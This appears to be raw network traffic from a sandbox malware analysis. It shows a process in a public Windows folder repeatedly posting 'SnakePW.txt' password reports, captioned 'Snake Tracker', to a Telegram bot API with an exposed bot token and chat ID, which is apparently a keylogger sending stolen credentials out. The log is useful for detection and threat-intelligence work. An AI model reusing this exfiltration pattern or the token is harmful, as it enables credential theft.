Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:23 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388996,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605982,"documen


                                                                                                                Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                80          192.168.2.7  49979        149.154.167.220  443               7660  C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                                                2024-11-26 07:26:22 UTC  334  OUT  POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd1011a0457cfd
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:22 UTC  537  OUT
                                                                                                                Data Ascii: --------------------------8dd1011a0457cfdContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:26:23 UTC  388  IN  HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:23 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:23 UTC  521  IN
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388998,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605982,"documen


                                                                                                                Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                81          192.168.2.7  49980        149.154.167.220  443               7240  C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                                                2024-11-26 07:26:22 UTC  334  OUT  POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd10f381542235
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:22 UTC  537  OUT
                                                                                                                Data Ascii: --------------------------8dd10f381542235Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:26:23 UTC  388  IN  HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:23 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:23 UTC  521  IN
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389000,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605983,"documen


                                                                                                                Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                82          192.168.2.7  49985        149.154.167.220  443               7924  C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                                                2024-11-26 07:26:24 UTC  334  OUT  POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd102ad1bb58e8
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:24 UTC  537  OUT
                                                                                                                Data Ascii: --------------------------8dd102ad1bb58e8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:26:25 UTC  388  IN  HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:25 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 523
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:25 UTC  523  IN
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389002,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605985,"documen


                                                                                                                Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                83          192.168.2.7  49987        149.154.167.220  443               7660  C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                                                2024-11-26 07:26:24 UTC  334  OUT  POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd10354bf3d436
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:24 UTC  537  OUT
                                                                                                                Data Ascii: --------------------------8dd10354bf3d436Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:26:25 UTC  388  IN  HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:25 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:25 UTC  521  IN
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389004,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605985,"documen


                                                                                                                Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                84          192.168.2.7  49988        149.154.167.220  443               7240  C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                                                2024-11-26 07:26:24 UTC  334  OUT  POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd112bbdaca27c
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:24 UTC  537  OUT
                                                                                                                Data Ascii: --------------------------8dd112bbdaca27cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:26:25 UTC  388  IN  HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:25 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:25 UTC  521  IN
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389006,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605985,"documen


                                                                                                                Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                85          192.168.2.7  49994        149.154.167.220  443               7924  C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                                                2024-11-26 07:26:26 UTC  358  OUT  POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd10564b4229a8
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                Connection: Keep-Alive
                                                                                                                2024-11-26 07:26:26 UTC  537  OUT
                                                                                                                Data Ascii: --------------------------8dd10564b4229a8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:26:31 UTC  388  IN  HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:31 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:31 UTC  521  IN
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389009,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605991,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
86 | 192.168.2.7 | 49995 | 149.154.167.220 | 443 | 7660 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:26 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd105de7de44b5
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:26:26 UTC | 537 | OUT
                                                                                                                Data Ascii: --------------------------8dd105de7de44b5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
2024-11-26 07:26:31 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:31 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:31 UTC | 521 | IN
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389008,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605991,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
87 | 192.168.2.7 | 49996 | 149.154.167.220 | 443 | 7240 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:27 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd11703916c344
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:26:27 UTC | 537 | OUT
                                                                                                                Data Ascii: --------------------------8dd11703916c344Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
2024-11-26 07:26:31 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:31 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:31 UTC | 521 | IN
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389011,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605991,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
88 | 192.168.2.7 | 50009 | 149.154.167.220 | 443 | 7660 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:33 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd10ec2ab08ceb
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:26:33 UTC | 537 | OUT
                                                                                                                Data Ascii: --------------------------8dd10ec2ab08cebContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
2024-11-26 07:26:33 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:33 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:33 UTC | 521 | IN
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389014,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605993,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
89 | 192.168.2.7 | 50010 | 149.154.167.220 | 443 | 7924 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:33 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd10f104b8c903
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:26:33 UTC | 537 | OUT
                                                                                                                Data Ascii: --------------------------8dd10f104b8c903Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
2024-11-26 07:26:33 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:33 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:33 UTC | 521 | IN
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389016,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605993,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
90 | 192.168.2.7 | 50011 | 149.154.167.220 | 443 | 7240 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:33 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd1275f877ff90
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:26:33 UTC | 537 | OUT
                                                                                                                Data Ascii: --------------------------8dd1275f877ff90Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
2024-11-26 07:26:33 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:33 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:33 UTC | 521 | IN
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389018,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605993,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
91 | 192.168.2.7 | 50017 | 149.154.167.220 | 443 | 7660 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:35 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd1121e522ff54
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:26:35 UTC | 537 | OUT
                                                                                                                Data Ascii: --------------------------8dd1121e522ff54Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
2024-11-26 07:26:35 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:35 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 519
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:35 UTC | 519 | IN
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389020,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605995,"documen


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                92 | 192.168.2.7 | 50018 | 149.154.167.220 | 443 | 7924 | C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-11-26 07:26:35 UTC | 358 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd112726dfdaef
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                Connection: Keep-Alive
                                                                                                                2024-11-26 07:26:35 UTC | 537 | OUT
                                                                                                                Data Ascii: --------------------------8dd112726dfdaefContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:26:35 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:35 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:35 UTC | 521 | IN
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389022,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605995,"documen


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                93 | 192.168.2.7 | 50019 | 149.154.167.220 | 443 | 7240 | C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-11-26 07:26:35 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd12d4ee8d8cfe
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:35 UTC | 537 | OUT
                                                                                                                Data Ascii: --------------------------8dd12d4ee8d8cfeContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:26:35 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:35 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:35 UTC | 521 | IN
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389024,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605995,"documen


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                94 | 192.168.2.7 | 50023 | 149.154.167.220 | 443 | 7660 | C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-11-26 07:26:37 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd114d7c71abd4
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:37 UTC | 537 | OUT
                                                                                                                Data Ascii: --------------------------8dd114d7c71abd4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:26:37 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:37 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:37 UTC | 521 | IN
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389026,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605997,"documen


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                95 | 192.168.2.7 | 50025 | 149.154.167.220 | 443 | 7924 | C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-11-26 07:26:37 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd11559464c338
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:37 UTC | 537 | OUT
                                                                                                                Data Ascii: --------------------------8dd11559464c338Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:26:37 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:37 GMT
